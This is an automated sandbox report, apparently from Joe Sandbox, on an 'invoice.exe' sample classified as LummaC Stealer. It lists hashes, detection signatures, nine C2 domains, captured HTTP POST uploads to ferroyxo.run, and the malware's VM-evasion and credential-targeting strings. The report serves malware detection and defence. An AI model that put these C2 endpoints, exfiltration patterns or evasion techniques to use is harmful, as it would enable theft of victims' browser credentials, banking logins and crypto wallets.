Windows Analysis Report
invoice.exe

Overview

General Information

Sample name: invoice.exe
Analysis ID: 1654483
MD5: 57bcb61167abd03d9d98705ab39e79ab
SHA1: 487af25088915c0506635a7bd44cd65177f91689
SHA256: 7c321f8a0d6c357d3406afb96408968d107c81f8282e2353ea4cebed67432f88
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious)
  • System is w10x64
  • invoice.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 57BCB61167ABD03D9D98705AB39E79AB)
  • cleanup

Malware configuration (LummaC):

{
  "C2 url": [
    "ferroyxo.run/quiwdz",
    "oreheatq.live/gsopp",
    "castmaxw.run/ganzde",
    "weldorae.digital/geds",
    "steelixr.live/aguiz",
    "advennture.top/GKsiio",
    "targett.top/dsANGt",
    "smeltingt.run/giiaus",
    "ferromny.digital/gwpd"
  ],
  "Build id": "e91dba334d13b3862d5fcf1c07f54f82f2e4b89799"
}
Yara matches

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.invoice.exe.2760000.1.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.invoice.exe.27c0000.2.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.invoice.exe.2760000.1.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Sigma

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-02T11:42:45.533112+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49681 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:46.849307+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49682 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:48.236401+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49683 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:49.246361+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49684 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:51.223014+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49685 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:52.409357+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49686 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:54.175757+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49687 | 172.67.131.170 | 443 | TCP

AV Detection

Source: https://ferroyxo.run/7g | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/quiwdz | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/7 | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/quiwdzr2 | Avira URL Cloud: Label: malware
Source: ferroyxo.run/quiwdz | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/ | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/quiwdzb | Avira URL Cloud: Label: malware
Source: https://ferroyxo.run/quiwdz55 | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["ferroyxo.run/quiwdz", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "e91dba334d13b3862d5fcf1c07f54f82f2e4b89799"}
Source: invoice.exe | Virustotal: Detection: 64%
Source: invoice.exe | ReversingLabs: Detection: 52%
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: ferroyxo.run/quiwdz
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: oreheatq.live/gsopp
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: castmaxw.run/ganzde
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: weldorae.digital/geds
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: steelixr.live/aguiz
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: advennture.top/GKsiio
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: targett.top/dsANGt
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: smeltingt.run/giiaus
Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp | String decryptor: ferromny.digital/gwpd
Source: invoice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49687 version: TLS 1.2
Source: invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor | URLs: ferroyxo.run/quiwdz
Source: Malware configuration extractor | URLs: oreheatq.live/gsopp
Source: Malware configuration extractor | URLs: castmaxw.run/ganzde
Source: Malware configuration extractor | URLs: weldorae.digital/geds
Source: Malware configuration extractor | URLs: steelixr.live/aguiz
Source: Malware configuration extractor | URLs: advennture.top/GKsiio
Source: Malware configuration extractor | URLs: targett.top/dsANGt
Source: Malware configuration extractor | URLs: smeltingt.run/giiaus
Source: Malware configuration extractor | URLs: ferromny.digital/gwpd
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 172.67.131.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 172.67.131.170:443
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 51
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=v3zzUIS0f2zrKhOW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 14498
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1f0d8SnvYvUO656QMv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 15070
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=d2pj0dUd2nx8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 20365
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=04CpSY8Q9xhdWEUI49d
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 2404
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=fbxl3f5CQUpt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 568670
    Host: ferroyxo.run
Source: global traffic | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 89
    Host: ferroyxo.run
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ferroyxo.run
Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
Source: unknown | HTTP traffic detected:
    POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 51
    Host: ferroyxo.run
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/
Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/7
Source: invoice.exe, 00000000.00000003.979948724.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.994824179.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/7g
Source: invoice.exe, 00000000.00000003.979670115.0000000000842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/quiwdz
Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/quiwdz55
Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/quiwdzb
Source: invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ferroyxo.run/quiwdzr2
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443

System Summary

Source: initial sample | Static PE information: Filename: invoice.exe
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007E7CF4
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007E52C9
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_00844699
Source: invoice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: invoice.exe | Static PE information: Section: .data ZLIB complexity 1.0000459241009683
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: invoice.exe, 00000000.00000003.934056465.0000000003251000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.920392947.0000000003297000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.921388098.0000000000855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\invoice.exe | File read: C:\Users\user\Desktop\invoice.exe
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: version.dll
Source: invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: invoice.exe | Static PE information: section name: .Dota
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007E4C7D push eax; ret | 0_3_007E4C9D
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007E6656 push eax; retf 007Ch | 0_3_007E6659
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007DC78C push ebx; ret | 0_3_007DC791
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_3_007DC788 push ss; ret | 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\invoice.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\invoice.exe | System information queried: FirmwareTableInformation
              Source: invoice.exe | Binary or memory string: PROCMON.EXE
              Source: invoice.exe | Binary or memory string: XENSERVICE.EXE
              Source: C:\Users\user\Desktop\invoice.exe TID: 7064 | Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\Desktop\invoice.exe TID: 7064 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\invoice.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
              Source: invoice.exe | Binary or memory string: MpVmp32EntryMetafile Recording ContextBi-Directional Text LayoutCursor Hotspot EditorOpenType Feature ActivatorPath Gradient GeneratorInk Recognition ProcessorDisplay Frequency SynchronizerMulti-Touch Gesture RecognizerAnti-Aliasing OptimizerTablet Pressure NormalizerDynamic Layout LocalizerDirectDraw Compatibility LayerFont Fallback Chain ResolverAccessibility Event RouterColor Space Converter16-bit Color Mode AdapterXPS Document RendererNon-Client Area RendererMultilingual Font MapperGDI Print Spooler HelperWindow Transparency ControllerText Antialiasing ControllerString Resource CompilerKeyboard Focus TrackerIcon Atlas PackerMouse Message ForwarderZ-Order Management Systemvmtoolsd.exeText Shaping EnginePixel Snapping Service0
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: invoice.exe, invoice.exe, 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.994878285.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002846121.0000000000799000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.916920006.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.973044989.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002987624.00000000007DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
              Source: invoice.exe, 00000000.00000003.934196029.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
